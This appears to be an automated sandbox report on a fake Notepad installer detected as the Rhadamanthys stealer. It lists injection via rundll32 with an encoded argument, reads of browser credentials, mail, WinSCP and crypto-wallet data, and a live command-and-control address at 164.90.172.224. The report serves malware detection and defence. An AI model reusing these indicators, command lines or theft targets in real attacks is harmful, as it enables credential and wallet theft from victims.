              Source: C:\Users\user\Desktop\Notteppad_SettupX32iX64.exeCode function: 0_2_004011A0 SetUnhandledExceptionFilter,__p__fmode,__p__environ,_cexit,ExitProcess,_setmode,_setmode,_setmode,0_2_004011A0
              Source: C:\Users\user\Desktop\Notteppad_SettupX32iX64.exeCode function: 0_2_006E96CA RtlAddVectoredExceptionHandler,RtlRemoveVectoredExceptionHandler,0_2_006E96CA
              Source: C:\Users\user\Desktop\Notteppad_SettupX32iX64.exeCode function: 0_2_006E9716 RtlAddVectoredExceptionHandler,RtlRemoveVectoredExceptionHandler,0_2_006E9716
              Source: C:\Users\user\Desktop\Notteppad_SettupX32iX64.exeCode function: 0_2_006E9FE9 RtlAddVectoredExceptionHandler,RtlRemoveVectoredExceptionHandler,0_2_006E9FE9
              Source: C:\Users\user\Desktop\Notteppad_SettupX32iX64.exeCode function: 0_2_006E9FDD RtlAddVectoredExceptionHandler,RtlRemoveVectoredExceptionHandler,0_2_006E9FDD
              Source: C:\Users\user\Desktop\Notteppad_SettupX32iX64.exeCode function: 0_2_006E9FB0 SetUnhandledExceptionFilter,SetUnhandledExceptionFilter,RaiseException,SetUnhandledExceptionFilter,0_2_006E9FB0

              HIPS / PFW / Operating System Protection Evasion

              barindex
              System process connects to network (likely due to code injection or exploit)
              Source: C:\Windows\System32\rundll32.exeNetwork Connect: 164.90.172.224 80Jump to behavior
              Searches for specific processes (likely to inject)
              Source: C:\Users\user\Desktop\Notteppad_SettupX32iX64.exeCode function: 0_2_006E9201 CreateToolhelp32Snapshot,Process32FirstW,StrCmpIW,Process32NextW,StrCmpIW,CloseHandle,CloseHandle,0_2_006E9201
              Source: C:\Users\user\Desktop\Notteppad_SettupX32iX64.exeCode function: NtQuerySystemInformation,NtQuerySystemInformation,malloc,NtQuerySystemInformation,GetCurrentProcess,GetCurrentProcess,lstrcmpiW,OpenProcess,GetCurrentProcess,CloseHandle,??3@YAXPAX@Z, explorer.exe0_2_006E3F5F
              Source: C:\Users\user\Desktop\Notteppad_SettupX32iX64.exeProcess created: C:\Windows\System32\rundll32.exe "c:\users\user\appdata\roaming\nsis_uns6283e8.dll",printuientry |5cqkohmaaaa|1tkr5gsmwyd|67sdqg8oaal|xymwxc0tnso|1k8b3tzkgiyf2sazqbyag4xap9sadmamgauakvkhwbs8|atbqpz8dwvaeoaub8abymazv8acqbtahuaqc8atabojwatavli|4pskogeagaa|0idxcjdzmzm|0yjrcqysilufyqqsilmjahdaf9ii0qkmeijbo0kgqe4sg8acejht0qkec0b6w6barcvsipaay8beiebqntiozyacywfa4sm|yria8hii8fi64tmqwfuewad0uj|i8qkcygi68f+zgvlsisejwdz8p8zyuilubhio||rddzig8igsp+lakg7wnqqzv+deegydrpmi|9augzbgzhrdn0herfldqgrehgq|y50builaovv10ilsp0awwoaqfp|vvzxqvrbvuh3vkfxxqfmgtln|1pni|hmi|ji34vzd4x88|bmy|9jpegbpalqrd8aaa+f6vpwqyv3hami8|cfwein3zwbd4twahgdvlsjjc0bd4th8|be|4tnieslxxyl|3ckritpgewd|+fma9lia|ezf8lfhckphktz8p9ni8rbixbfm||ssaptigkewp90huhbyg0pvr3a+gabrapqvxf1|+xbgfqq|a18|3qog8ebsypa|wrbo8lzaevg|4vbd7cmtkwl|yyltaprdfgzfe2qehrrqysuwqd|0zpjigjmi8jv6w|bycgra8jleo8bqyoa1rdtm8a|m|zbowy24bcmap+dxggd+ahy7v|rckily0h|1b9jiqt3g8xkems|bdtvghkvzgfb|19bxkfdqvxf915dwzmxsihsyp0bzacl6ehm|v9||0ifwa+emhug60ynrwglkxdim||76jt9ii1fbeyn|0vgm9kly|9u+yrogcbmi+aphpvrdsbfqbazwivtvpegsil8jccmihb+gcbii|aphet1ip6mifbijvyiri2|r0bijywkhrfi34vy6hz9ficnvtvi3iaq4ihm8|doz37vieslbo1xceegeqygwmohiyqkgics7d7z8iso2ibyiyyxjherbzcriogx7ycl|zwtmkylxtpig|f7beikidbmiwtfjdhmi6qamkyj3vyeayqk3icrhpj2jrgnr0swjctw8|c|syvu6on8btck3zx4mkinhhgyqyd|8ygnt2xembj+pakd6qf184g8|ngyivjlehvni3eejpqimzqk+dub|8jio9hyoip6f2x2m0snsud6ae+uqbgamacmiedkis|4dbletjdamumn91qkbjegsypoblvoa4iwsivopib4|0if|3qsi1vc+uyombsxsi1mjeaf|9digcr0iweklqgalqe=
              Source: C:\Users\user\Desktop\Notteppad_SettupX32iX64.exeProcess created: C:\Windows\System32\rundll32.exe "c:\users\user\appdata\roaming\nsis_uns6283e8.dll",printuientry |5cqkohmaaaa|1tkr5gsmwyd|67sdqg8oaal|xymwxc0tnso|1k8b3tzkgiyf2sazqbyag4xap9sadmamgauakvkhwbs8|atbqpz8dwvaeoaub8abymazv8acqbtahuaqc8atabojwatavli|4pskogeagaa|0idxcjdzmzm|0yjrcqysilufyqqsilmjahdaf9ii0qkmeijbo0kgqe4sg8acejht0qkec0b6w6barcvsipaay8beiebqntiozyacywfa4sm|yria8hii8fi64tmqwfuewad0uj|i8qkcygi68f+zgvlsisejwdz8p8zyuilubhio||rddzig8igsp+lakg7wnqqzv+deegydrpmi|9augzbgzhrdn0herfldqgrehgq|y50builaovv10ilsp0awwoaqfp|vvzxqvrbvuh3vkfxxqfmgtln|1pni|hmi|ji34vzd4x88|bmy|9jpegbpalqrd8aaa+f6vpwqyv3hami8|cfwein3zwbd4twahgdvlsjjc0bd4th8|be|4tnieslxxyl|3ckritpgewd|+fma9lia|ezf8lfhckphktz8p9ni8rbixbfm||ssaptigkewp90huhbyg0pvr3a+gabrapqvxf1|+xbgfqq|a18|3qog8ebsypa|wrbo8lzaevg|4vbd7cmtkwl|yyltaprdfgzfe2qehrrqysuwqd|0zpjigjmi8jv6w|bycgra8jleo8bqyoa1rdtm8a|m|zbowy24bcmap+dxggd+ahy7v|rckily0h|1b9jiqt3g8xkems|bdtvghkvzgfb|19bxkfdqvxf915dwzmxsihsyp0bzacl6ehm|v9||0ifwa+emhug60ynrwglkxdim||76jt9ii1fbeyn|0vgm9kly|9u+yrogcbmi+aphpvrdsbfqbazwivtvpegsil8jccmihb+gcbii|aphet1ip6mifbijvyiri2|r0bijywkhrfi34vy6hz9ficnvtvi3iaq4ihm8|doz37vieslbo1xceegeqygwmohiyqkgics7d7z8iso2ibyiyyxjherbzcriogx7ycl|zwtmkylxtpig|f7beikidbmiwtfjdhmi6qamkyj3vyeayqk3icrhpj2jrgnr0swjctw8|c|syvu6on8btck3zx4mkinhhgyqyd|8ygnt2xembj+pakd6qf184g8|ngyivjlehvni3eejpqimzqk+dub|8jio9hyoip6f2x2m0snsud6ae+uqbgamacmiedkis|4dbletjdamumn91qkbjegsypoblvoa4iwsivopib4|0if|3qsi1vc+uyombsxsi1mjeaf|9digcr0iweklqgalqe=Jump to behavior
              Source: C:\Users\user\Desktop\Notteppad_SettupX32iX64.exeCode function: 0_2_006E434F memset,ShellExecuteExW,CloseHandle,GetLastError,0_2_006E434F
              Source: C:\Users\user\Desktop\Notteppad_SettupX32iX64.exeCode function: 0_2_006E4444 _snwprintf,_snwprintf,OpenMutexW,OpenMutexW,_snwprintf,OpenMutexW,GetCurrentProcessId,ProcessIdToSessionId,InitializeSecurityDescriptor,_snwprintf,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateMutexW,GetLastError,_snwprintf,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateMutexW,GetLastError,CloseHandle,0_2_006E4444
              Source: Notteppad_SettupX32iX64.exe, 00000000.00000003.260789377.0000000002833000.00000004.00000020.00020000.00000000.sdmp, Notteppad_SettupX32iX64.exe, 00000000.00000003.262323104.0000000002E00000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: TargetundeleteSoftware\Microsoft\Tracking\TimeOut::{9db1186e-40df-11d1-aa8c-00c04fb67863}:Shell_TrayWnd
              Source: Notteppad_SettupX32iX64.exe, 00000000.00000003.257766022.0000000004A60000.00000004.00001000.00020000.00000000.sdmp, Notteppad_SettupX32iX64.exe, 00000000.00000003.255570037.00000000036E3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ShellFileViewFolderExploreFolderConfirmCabinetIDDeleteGroupDeleteItemReplaceItemReloadFindFolderOpenFindFileCreateGroupShowGroupAddItemExitProgman[RN
              Source: Notteppad_SettupX32iX64.exe, 00000000.00000003.257766022.0000000004A60000.00000004.00001000.00020000.00000000.sdmp, Notteppad_SettupX32iX64.exe, 00000000.00000003.255570037.00000000036E3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %c:\%sExplorerDMGFrameGroupssetupPmFrameGetIconGetDescriptionGetWorkingDirSoftware\Microsoft\Windows\CurrentVersion\Explorer\MapGroupsSenderCA_DDECLASSInstallMake Program Manager GroupStartUpccInsDDEBWWFrameDDEClientWndClassBACKSCAPEMediaRecorderMedia Recorder#32770DDEClientddeClassgroups
              Source: Notteppad_SettupX32iX64.exe, 00000000.00000003.248888902.000000000250B000.00000004.00000020.00020000.00000000.sdmp, Notteppad_SettupX32iX64.exe, 00000000.00000003.249465359.0000000002830000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: GetProgmanWindow
              Source: rundll32.exe, 00000001.00000003.280113547.0000025AA3510000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: WindowOverrideScaleFactorShell_TrayWnd[
              Source: Notteppad_SettupX32iX64.exe, 00000000.00000003.257766022.0000000004A60000.00000004.00001000.00020000.00000000.sdmp, Notteppad_SettupX32iX64.exe, 00000000.00000003.255570037.00000000036E3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PreviewMetadataLabelPreviewMetadataSpacerPreviewEditMetadataPreviewMetadataControlIconLayoutsWorkAreaChangeActivityPreviewMetadataRowAddRemoveAppBarShell_TrayWndhomepagetasklinktasklinkTaskSearchTexttasks%s
              Source: Notteppad_SettupX32iX64.exe, 00000000.00000003.257766022.0000000004A60000.00000004.00001000.00020000.00000000.sdmp, Notteppad_SettupX32iX64.exe, 00000000.00000003.255570037.00000000036E3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: animationTileContentsSrcVerticalScrollBaranimationProgressSrcanimationTileContentsDstInneranimationTileContentsSrcInneranimationTileContentsDstanimationProgressDstInneranimationProgressDstanimationProgressSrcInnereltRegularTileHeadereltSummaryeltInterruptPaneeltProgressBaridOperationTileeltInterruptDoForAlleltItemIconeltInterruptDescriptioneltInterruptButtonsContainereltInterruptDeleteBtneltInterruptElevateBtneltItemPropseltItemNameeltInterruptYesBtneltInterruptRetryBtneltInterruptCancelBtneltInterruptSkipBtnConfirmationCheckBoxDoForAlleltInterruptNoBtneltInterruptOKBtnshell\shell32\operationstatusmgr.cppidTileSubTextidOperationInterrupteltInterruptDoForAllLabelidTileActionIdTileKeepSourceidItemTileIdTileDecideForEachIdTileIgnoreIdTileKeepAsPersonalIdTileKeepAsWorkIdTileKeepDestCustomCommandIconDecideForEachTileIconSkipTileIconKeepSourceTileIconeltItemTileContainereltConflictInterruptDescriptionidTileIconidCustomConflictInterrupteltInterruptTileHeaderidConflictInterrupteltRateChartCHARTVIEW%0.2fIdTileDefaulteltPauseButtoneltTileContentseltTile%ueltTimeRemainingeltConflictInterrupteltConfirmationInterrupteltLocationseltItemsRemainingeltDetailseltScrolleltRegularTileeltCancelButtonidTileHosteltScrollBarFillereltDividereltProgressBarContainereltDisplayModeBtnFocusHoldereltDisplayModeBtnWindows.SystemToast.ExplorerEnthusiastModeprogmaneltFooterArealfEscapementSoftware\Microsoft\NotepadRICHEDIT50WlfUnderlinelfItaliclfWeightlfOrientationlfClipPrecisionlfOutPrecisionlfCharSetlfStrikeOutLucida ConsoleiPointSizelfPitchAndFamilylfQualitylfFaceName
              Source: Notteppad_SettupX32iX64.exe, 00000000.00000003.260362834.0000000000CC0000.00000004.00001000.00020000.00000000.sdmp, Notteppad_SettupX32iX64.exe, 00000000.00000003.259962474.0000000002508000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Shell_TrayWndSHCore.Subclass.DataSystem\CurrentControlSet\Control\HvsiWindowOverrideScaleFactorSoftware\Microsoft\Windows\CurrentVersion\Explorer\FCM\Impolite[
              Source: Notteppad_SettupX32iX64.exe, 00000000.00000003.255570037.00000000036E3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ImageList_CoCreateInstanceProgmanProgram Managercomctl32.dllImageList_ReplaceIconImageList_CreateImageList_Destroy
              Source: Notteppad_SettupX32iX64.exe, 00000000.00000003.257766022.0000000004A60000.00000004.00001000.00020000.00000000.sdmp, Notteppad_SettupX32iX64.exe, 00000000.00000003.255570037.00000000036E3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: |}TFoldersAppPropertiesShell*ProgmanProgmanPROGMANSoftware\Microsoft\Windows\CurrentVersion\PoliciesPolicyAutoColorizationHandleAssociationChange
              Source: Notteppad_SettupX32iX64.exe, 00000000.00000003.248888902.000000000250B000.00000004.00000020.00020000.00000000.sdmp, Notteppad_SettupX32iX64.exe, 00000000.00000003.249465359.0000000002830000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: SetProgmanWindow
              Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Notteppad_SettupX32iX64.exeCode function: rand,memset,GetUserDefaultLangID,GetUserDefaultLangID,GetLocaleInfoW,GetLocaleInfoW,GetUserDefaultLangID,GetLocaleInfoW,_snwprintf,WideCharToMultiByte,_snprintf,0_2_006E396E
              Source: C:\Users\user\Desktop\Notteppad_SettupX32iX64.exeCode function: 0_2_006EAAA5 SetupDiGetClassDevsW,SetupDiEnumDeviceInfo,StrStrIW,SetupDiGetDeviceRegistryPropertyW,SetupDiGetDeviceRegistryPropertyW,GetLastError,LocalFree,LocalAlloc,StrStrIW,StrStrIW,StrStrIW,StrStrIW,SetupDiEnumDeviceInfo,LocalFree,SetupDiDestroyDeviceInfoList,GetLastError,GetLastError,GetLastError,0_2_006EAAA5
              Source: C:\Users\user\Desktop\Notteppad_SettupX32iX64.exeCode function: 0_2_00407B50 cpuid 0_2_00407B50
              Source: C:\Windows\System32\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
              Source: C:\Windows\System32\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
              Source: C:\Windows\System32\rundll32.exeCode function: 1_2_00007DF4B3C1B92C CreateNamedPipeW,BindIoCompletionCallback,ConnectNamedPipe,1_2_00007DF4B3C1B92C
              Source: C:\Users\user\Desktop\Notteppad_SettupX32iX64.exeCode function: 0_2_006EA63E malloc,GetUserNameW,??3@YAXPAX@Z,0_2_006EA63E

              Stealing of Sensitive Information

              barindex
              Yara detected RHADAMANTHYS Stealer
              Source: Yara matchFile source: Process Memory Space: Notteppad_SettupX32iX64.exe PID: 5280, type: MEMORYSTR
              Tries to steal Mail credentials (via file / registry access)
              Source: C:\Windows\System32\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\OutlookJump to behavior
              Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
              Source: C:\Windows\System32\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Configuration\SecurityJump to behavior
              Tries to harvest and steal Bitcoin Wallet information
              Source: C:\Windows\System32\rundll32.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Bitcoin\Bitcoin-QtJump to behavior
              Source: C:\Windows\System32\rundll32.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-coreJump to behavior
              Found many strings related to Crypto-Wallets (likely being stolen)
              Source: rundll32.exe, 00000001.00000003.297183329.0000025AA412C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: framework.parse_path([[%AppData%\ElectrumSV\config]]),
              Source: rundll32.exe, 00000001.00000003.297183329.0000025AA412C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: framework.parse_path([[%AppData%\ElectronCash\config]]),
              Source: rundll32.exe, 00000001.00000003.267432488.0000025AA371A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: framework.parse_path([[%AppData%\com.liberty.jaxx]]),
              Source: rundll32.exe, 00000001.00000003.267432488.0000025AA371A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: framework.parse_path([[%AppData%\Exodus\exodus.wallet]]),
              Source: rundll32.exe, 00000001.00000003.267432488.0000025AA371A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: framework.parse_path([[%AppData%\Exodus\exodus.wallet]]),
              Tries to harvest and steal browser information (history, passwords, etc)
              Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
              Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BookmarksJump to behavior
              Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
              Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
              Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
              Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.logJump to behavior

              Remote Access Functionality

              barindex
              Yara detected RHADAMANTHYS Stealer
              Source: Yara matchFile source: Process Memory Space: Notteppad_SettupX32iX64.exe PID: 5280, type: MEMORYSTR
              Source: C:\Users\user\Desktop\Notteppad_SettupX32iX64.exeCode function: 0_2_006F0442 socket,WSAGetLastError,SetHandleInformation,GetLastError,closesocket,bind,WSAGetLastError,0_2_006F0442
              Source: C:\Windows\System32\rundll32.exeCode function: 1_2_00007DF4B3C1B92C CreateNamedPipeW,BindIoCompletionCallback,ConnectNamedPipe,1_2_00007DF4B3C1B92C
              Source: C:\Windows\System32\rundll32.exeCode function: 1_2_00007DF4B3C448E4 socket,bind,1_2_00007DF4B3C448E4

              Mitre Att&ck Matrix

              Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
              Valid Accounts2
              Native API              		Path Interception1
              Exploitation for Privilege Escalation              		1
              Disable or Modify Tools              		1
              OS Credential Dumping              		1
              Account Discovery              		Remote Services1
              Archive Collected Data              		Exfiltration Over Other Network Medium2
              Ingress Tool Transfer              		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
              Default Accounts12
              Command and Scripting Interpreter              		Boot or Logon Initialization Scripts213
              Process Injection              		1
              Deobfuscate/Decode Files or Information              		21
              Input Capture              		2
              File and Directory Discovery              		Remote Desktop Protocol2
              Data from Local System              		Exfiltration Over Bluetooth2
              Encrypted Channel              		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
              Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)2
              Obfuscated Files or Information              		1
              Credentials in Registry              		64
              System Information Discovery              		SMB/Windows Admin Shares1
              Email Collection              		Automated Exfiltration1
              Non-Application Layer Protocol              		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
              Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)1
              Software Packing              		NTDS1
              Query Registry              		Distributed Component Object Model21
              Input Capture              		Scheduled Transfer1
              Application Layer Protocol              		SIM Card SwapCarrier Billing Fraud
              Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
              Masquerading              		LSA Secrets531
              Security Software Discovery              		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
              Replication Through Removable MediaLaunchdRc.commonRc.common33
              Virtualization/Sandbox Evasion              		Cached Domain Credentials33
              Virtualization/Sandbox Evasion              		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
              External Remote ServicesScheduled TaskStartup ItemsStartup Items213
              Process Injection              		DCSync112
              Process Discovery              		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
              Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job1
              Rundll32              		Proc Filesystem1
              System Owner/User Discovery              		Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              Notteppad_SettupX32iX64.exe20%ReversingLabsWin32.Spyware.Rhadamanthys
              Notteppad_SettupX32iX64.exe21%VirustotalBrowse

              Dropped Files

              No Antivirus matches

              Unpacked PE Files

              No Antivirus matches

              Domains

              No Antivirus matches

              URLs

              SourceDetectionScannerLabelLink
              https://discord.com0%URL Reputationsafe
              http://164.90.172.224/blob/oo6nbv.a50a0%Avira URL Cloudsafe
              http:///etc/puk.keyMachineGuidSOFTWARE0%Avira URL Cloudsafe
              http:///etc/puk.keyGET13ConnectionupgradeUpgradewebsocketUser-Agentcurl/5.9Sec-Websocket-KeySec-Webs0%Avira URL Cloudsafe
              http://164.90.172.224/blob/oo6nbv.a50a0%VirustotalBrowse

              Domains and IPs

              Contacted Domains

              No contacted domains info

              Contacted URLs

              NameMaliciousAntivirus DetectionReputation
              http://164.90.172.224/blob/oo6nbv.a50atrue
              • 0%, Virustotal, Browse
              • Avira URL Cloud: safe
              		unknown

              URLs from Memory and Binaries

              NameSourceMaliciousAntivirus DetectionReputation
              https://www.google.com/intl/en_uk/chrome/Googlerundll32.exe, 00000001.00000003.300138024.0000025AA373B000.00000004.00000020.00020000.00000000.sdmpfalse
                		high
                https://discord.comrundll32.exe, 00000001.00000003.267749823.0000025AA392B000.00000004.00000020.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                https://support.google.com/chrome/answer/111996?visit_id=637962485686793996-3320600880&p=update_errorundll32.exe, 00000001.00000003.300138024.0000025AA373B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000001.00000003.300201073.0000025AA39D6000.00000004.00000020.00020000.00000000.sdmpfalse
                  		high
                  https://www.google.com/search?q=chrome&oq=chrome&aqs=chrome..69i57j0j5l3j69i60l3.2663j0j4&sourceid=crundll32.exe, 00000001.00000003.300201073.0000025AA39D6000.00000004.00000020.00020000.00000000.sdmpfalse
                    		high
                    http:///etc/puk.keyMachineGuidSOFTWARErundll32.exe, 00000001.00000003.319087648.0000025AA4151000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000001.00000003.267432488.0000025AA372E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000001.00000003.267749823.0000025AA392B000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		low
                    https://www.google.com/intl/en_uk/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrowsrundll32.exe, 00000001.00000003.300201073.0000025AA39D6000.00000004.00000020.00020000.00000000.sdmpfalse
                      		high
                      https://www.google.com/intl/en_uk/chrome/rundll32.exe, 00000001.00000003.300201073.0000025AA39D6000.00000004.00000020.00020000.00000000.sdmpfalse
                        		high
                        https://discordapp.comrundll32.exe, 00000001.00000003.267749823.0000025AA392B000.00000004.00000020.00020000.00000000.sdmpfalse
                          		high
                          https://www.google.com/intl/en_uk/chrome/https://www.google.com/intl/en_uk/chrome/https://www.googlerundll32.exe, 00000001.00000003.300183680.0000025AA39D9000.00000004.00000020.00020000.00000000.sdmpfalse
                            		high
                            https://support.google.com/chrome?p=update_errorFixrundll32.exe, 00000001.00000003.300138024.0000025AA373B000.00000004.00000020.00020000.00000000.sdmpfalse
                              		high
                              http:///etc/puk.keyGET13ConnectionupgradeUpgradewebsocketUser-Agentcurl/5.9Sec-Websocket-KeySec-Websrundll32.exe, 00000001.00000003.267749823.0000025AA3A20000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		low
                              https://support.google.com/chrome?p=update_errorrundll32.exe, 00000001.00000003.300201073.0000025AA39D6000.00000004.00000020.00020000.00000000.sdmpfalse
                                		high
                                https://support.google.com/chrome/answer/6315198?product=rundll32.exe, 00000001.00000003.300138024.0000025AA373B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000001.00000003.300201073.0000025AA39D6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000001.00000002.320753776.0000025AA39CC000.00000004.00000020.00020000.00000000.sdmpfalse
                                  		high
                                  https://support.google.com/installer/?product=rundll32.exe, 00000001.00000003.300201073.0000025AA39D6000.00000004.00000020.00020000.00000000.sdmpfalse
                                    		high

                                    World Map of Contacted IPs

                                    • No. of IPs < 25%
                                    • 25% < No. of IPs < 50%
                                    • 50% < No. of IPs < 75%
                                    • 75% < No. of IPs

                                    Public IPs

                                    IPDomainCountryFlagASNASN NameMalicious
                                    164.90.172.224
                                    		unknownUnited States
                                    		14061DIGITALOCEAN-ASNUStrue

                                    General Information

                                    Joe Sandbox Version:36.0.0 Rainbow Opal
                                    Analysis ID:783578
                                    Start date and time:2023-01-13 05:11:07 +01:00
                                    Joe Sandbox Product:CloudBasic
                                    Overall analysis duration:0h 9m 29s
                                    Hypervisor based Inspection enabled:false
                                    Report type:full
                                    Sample file name:Notteppad_SettupX32iX64.exe
                                    Cookbook file name:default.jbs
                                    Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                    Number of analysed new started processes analysed:19
                                    Number of new started drivers analysed:0
                                    Number of existing processes analysed:0
                                    Number of existing drivers analysed:0
                                    Number of injected processes analysed:0
                                    Technologies:
                                    • HCA enabled
                                    • EGA enabled
                                    • HDC enabled
                                    • AMSI enabled
                                    Analysis Mode:default
                                    Analysis stop reason:Timeout
                                    Detection:MAL
                                    Classification:mal100.troj.spyw.evad.winEXE@4/1@0/1
                                    EGA Information:
                                    • Successful, ratio: 100%
                                    HDC Information:
                                    • Successful, ratio: 18.2% (good quality ratio 10%)
                                    • Quality average: 42.4%
                                    • Quality standard deviation: 42.4%
                                    HCA Information:
                                    • Successful, ratio: 79%
                                    • Number of executed functions: 112
                                    • Number of non-executed functions: 162
                                    Cookbook Comments:
                                    • Found application associated with file extension: .exe
                                    • Override analysis time to 240s for rundll32

                                    Warnings

                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, WerFault.exe, WMIADAP.exe, SgrmBroker.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
                                    • Excluded domains from analysis (whitelisted): fs.microsoft.com
                                    • Not all processes where analyzed, report is missing behavior information
                                    • Report size getting too big, too many NtOpenFile calls found.
                                    • Report size getting too big, too many NtQueryValueKey calls found.

                                    Simulations

                                    Behavior and APIs

                                    No simulations

                                    Joe Sandbox View / Context

                                    IPs

                                    No context

                                    Domains

                                    No context

                                    ASNs

                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                    DIGITALOCEAN-ASNUSwescom_#771933.shtmlGet hashmaliciousBrowse
                                    • 159.89.13.16
                                    https://jp5w5.app.link/thZIVuvoowbGet hashmaliciousBrowse
                                    • 198.211.98.91
                                    Ziraat Bankasi Swift Mesaji.exeGet hashmaliciousBrowse
                                    • 161.35.150.245
                                    http://oneidentity.comGet hashmaliciousBrowse
                                    • 178.128.135.232
                                    scan_arm5.elfGet hashmaliciousBrowse
                                    • 142.93.67.177
                                    4kZEe5B5Bj.elfGet hashmaliciousBrowse
                                    • 157.245.75.202
                                    19Nl3SvL0F.elfGet hashmaliciousBrowse
                                    • 157.245.170.78
                                    j6gZZBx2MN.elfGet hashmaliciousBrowse
                                    • 178.62.98.82
                                    XNich7Sml7.elfGet hashmaliciousBrowse
                                    • 157.245.182.22
                                    1EsDtA4mep.exeGet hashmaliciousBrowse
                                    • 165.227.252.190
                                    https://roblox-gift-cardes.blogspot.com/Get hashmaliciousBrowse
                                    • 188.166.103.175
                                    file.dllGet hashmaliciousBrowse
                                    • 209.97.163.214
                                    remote.exeGet hashmaliciousBrowse
                                    • 167.99.35.88
                                    SecuriteInfo.com.Gen.Variant.Nemesis.16281.17431.22579.exeGet hashmaliciousBrowse
                                    • 107.170.243.8
                                    http://164.90.194.65Get hashmaliciousBrowse
                                    • 164.90.194.65
                                    azures-sms-sender.exeGet hashmaliciousBrowse
                                    • 159.203.78.154
                                    azures-sms-sender.exeGet hashmaliciousBrowse
                                    • 159.203.78.154
                                    http://098643234567dalexander.populr.me/untitledGet hashmaliciousBrowse
                                    • 159.203.159.224
